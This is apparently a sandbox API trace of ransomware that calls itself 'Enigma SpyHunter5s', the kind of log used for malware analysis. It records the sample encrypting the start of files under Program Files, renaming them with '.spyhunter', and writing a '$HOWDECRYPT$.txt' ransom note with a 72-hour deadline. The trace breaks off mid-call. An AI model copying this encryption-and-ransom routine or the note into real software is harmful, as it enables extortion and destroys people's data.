[0162.279] GetProcessHeap () returned 0x2c0000 [0162.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.279] GetProcessHeap () returned 0x2c0000 [0162.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eebc00 | out: hHeap=0x2c0000) returned 1 [0162.279] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e810 | out: pbBuffer=0x57e810) returned 1 [0162.279] GetProcessHeap () returned 0x2c0000 [0162.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.279] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e808*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e808*=0x30) returned 1 [0162.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.313] GetProcessHeap () returned 0x2c0000 [0162.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.313] GetProcessHeap () returned 0x2c0000 [0162.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb428 | out: hHeap=0x2c0000) returned 1 [0162.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.320] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.320] WriteFile (in: hFile=0x178, lpBuffer=0x57e73f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e868, lpOverlapped=0x0 | out: lpBuffer=0x57e73f*, lpNumberOfBytesWritten=0x57e868*=0x127, lpOverlapped=0x0) returned 1 [0162.321] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.321] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e868, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e868*=0x2ac, lpOverlapped=0x0) returned 1 [0162.321] CloseHandle (hObject=0x178) returned 1 [0162.321] GetProcessHeap () returned 0x2c0000 [0162.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e960 | out: hHeap=0x2c0000) returned 1 [0162.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e808 | out: pbBuffer=0x57e808) returned 1 [0162.322] GetProcessHeap () returned 0x2c0000 [0162.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e800*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e800*=0x30) returned 1 [0162.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\mpvis.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\mpvis.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.328] GetProcessHeap () returned 0x2c0000 [0162.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.328] GetProcessHeap () returned 0x2c0000 [0162.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e070f8 | out: hHeap=0x2c0000) returned 1 [0162.328] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e800 | out: pbBuffer=0x57e800) returned 1 [0162.328] GetProcessHeap () returned 0x2c0000 [0162.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.328] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e7f8*=0x30) returned 1 [0162.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wab.exe" (normalized: "c:\\program files (x86)\\windows mail\\wab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.331] GetProcessHeap () returned 0x2c0000 [0162.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.332] GetProcessHeap () returned 0x2c0000 [0162.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33da80 | out: hHeap=0x2c0000) returned 1 [0162.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e800 | out: pbBuffer=0x57e800) returned 1 [0162.332] GetProcessHeap () returned 0x2c0000 [0162.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e7f8*=0x30) returned 1 [0162.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\exclusively-leading.exe" (normalized: "c:\\program files (x86)\\windows mail\\exclusively-leading.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.332] GetProcessHeap () returned 0x2c0000 [0162.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.332] GetProcessHeap () returned 0x2c0000 [0162.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec61e0 | out: hHeap=0x2c0000) returned 1 [0162.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.397] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.397] WriteFile (in: hFile=0xa0, lpBuffer=0x57e72f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e858, lpOverlapped=0x0 | out: lpBuffer=0x57e72f*, lpNumberOfBytesWritten=0x57e858*=0x127, lpOverlapped=0x0) returned 1 [0162.398] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.398] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e858, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e858*=0x2ac, lpOverlapped=0x0) returned 1 [0162.398] CloseHandle (hObject=0xa0) returned 1 [0162.398] GetProcessHeap () returned 0x2c0000 [0162.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6118 | out: hHeap=0x2c0000) returned 1 [0162.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7f8 | out: pbBuffer=0x57e7f8) returned 1 [0162.398] GetProcessHeap () returned 0x2c0000 [0162.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7f0*=0x30) returned 1 [0162.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.532] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets") returned 68 [0162.533] StrStrW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".txt") returned 0x0 [0162.533] GetProcessHeap () returned 0x2c0000 [0162.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0162.533] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e7b4*=0x2fc, lpOverlapped=0x0) returned 1 [0162.640] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.640] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x57e7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e7b4*=0x2fc, lpOverlapped=0x0) returned 1 [0162.641] GetProcessHeap () returned 0x2c0000 [0162.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0162.641] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.641] WriteFile (in: hFile=0xa0, lpBuffer=0x57e7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e7b4, lpOverlapped=0x0 | out: lpBuffer=0x57e7f4*, lpNumberOfBytesWritten=0x57e7b4*=0x4, lpOverlapped=0x0) returned 1 [0162.641] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e7b4*=0x30, lpOverlapped=0x0) returned 1 [0162.641] CloseHandle (hObject=0xa0) returned 1 [0162.641] GetProcessHeap () returned 0x2c0000 [0162.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.641] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.spyhunter") returned 78 [0162.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.spyhunter" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets.spyhunter")) returned 1 [0162.642] GetProcessHeap () returned 0x2c0000 [0162.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.642] GetProcessHeap () returned 0x2c0000 [0162.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.642] GetProcessHeap () returned 0x2c0000 [0162.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e378 | out: hHeap=0x2c0000) returned 1 [0162.643] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7f0 | out: pbBuffer=0x57e7f0) returned 1 [0162.643] GetProcessHeap () returned 0x2c0000 [0162.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.643] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7e8*=0x30) returned 1 [0162.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.643] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe") returned 68 [0162.643] StrStrW (lpFirst="Uninstall.exe", lpSrch=".txt") returned 0x0 [0162.643] GetProcessHeap () returned 0x2c0000 [0162.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0162.643] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e7ac*=0x2800, lpOverlapped=0x0) returned 1 [0162.660] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.660] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e7ac*=0x2800, lpOverlapped=0x0) returned 1 [0162.661] GetProcessHeap () returned 0x2c0000 [0162.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0162.661] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.661] WriteFile (in: hFile=0xa0, lpBuffer=0x57e7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x57e7ec*, lpNumberOfBytesWritten=0x57e7ac*=0x4, lpOverlapped=0x0) returned 1 [0162.661] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e7ac*=0x30, lpOverlapped=0x0) returned 1 [0162.661] CloseHandle (hObject=0xa0) returned 1 [0162.662] GetProcessHeap () returned 0x2c0000 [0162.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.662] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.spyhunter") returned 78 [0162.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe.spyhunter")) returned 1 [0162.663] GetProcessHeap () returned 0x2c0000 [0162.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.663] GetProcessHeap () returned 0x2c0000 [0162.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.663] GetProcessHeap () returned 0x2c0000 [0162.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1c8 | out: hHeap=0x2c0000) returned 1 [0162.663] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7f0 | out: pbBuffer=0x57e7f0) returned 1 [0162.663] GetProcessHeap () returned 0x2c0000 [0162.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.663] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7e8*=0x30) returned 1 [0162.663] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.665] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe") returned 65 [0162.665] StrStrW (lpFirst="webapp-uninstaller.exe", lpSrch=".txt") returned 0x0 [0162.665] GetProcessHeap () returned 0x2c0000 [0162.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.666] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e7ac*=0x2800, lpOverlapped=0x0) returned 1 [0162.675] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.675] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e7ac*=0x2800, lpOverlapped=0x0) returned 1 [0162.675] GetProcessHeap () returned 0x2c0000 [0162.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.675] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.675] WriteFile (in: hFile=0xa0, lpBuffer=0x57e7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x57e7ec*, lpNumberOfBytesWritten=0x57e7ac*=0x4, lpOverlapped=0x0) returned 1 [0162.687] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e7ac*=0x30, lpOverlapped=0x0) returned 1 [0162.688] CloseHandle (hObject=0xa0) returned 1 [0162.688] GetProcessHeap () returned 0x2c0000 [0162.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0162.688] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe.spyhunter") returned 75 [0162.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapp-uninstaller.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapp-uninstaller.exe.spyhunter")) returned 1 [0162.689] GetProcessHeap () returned 0x2c0000 [0162.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0162.689] GetProcessHeap () returned 0x2c0000 [0162.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.689] GetProcessHeap () returned 0x2c0000 [0162.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06a78 | out: hHeap=0x2c0000) returned 1 [0162.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0162.716] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.717] WriteFile (in: hFile=0x9c, lpBuffer=0x57e71f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e848, lpOverlapped=0x0 | out: lpBuffer=0x57e71f*, lpNumberOfBytesWritten=0x57e848*=0x127, lpOverlapped=0x0) returned 1 [0162.717] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.717] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e848, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e848*=0x2ac, lpOverlapped=0x0) returned 1 [0162.718] CloseHandle (hObject=0x9c) returned 1 [0162.718] GetProcessHeap () returned 0x2c0000 [0162.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7edc0 | out: hHeap=0x2c0000) returned 1 [0162.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7e8 | out: pbBuffer=0x57e7e8) returned 1 [0162.718] GetProcessHeap () returned 0x2c0000 [0162.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.718] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7e0*=0x30) returned 1 [0162.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0162.719] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll") returned 55 [0162.719] StrStrW (lpFirst="softokn3.dll", lpSrch=".txt") returned 0x0 [0162.719] GetProcessHeap () returned 0x2c0000 [0162.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.719] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e7a4*=0x2800, lpOverlapped=0x0) returned 1 [0162.774] SetFilePointerEx (in: hFile=0x9c, 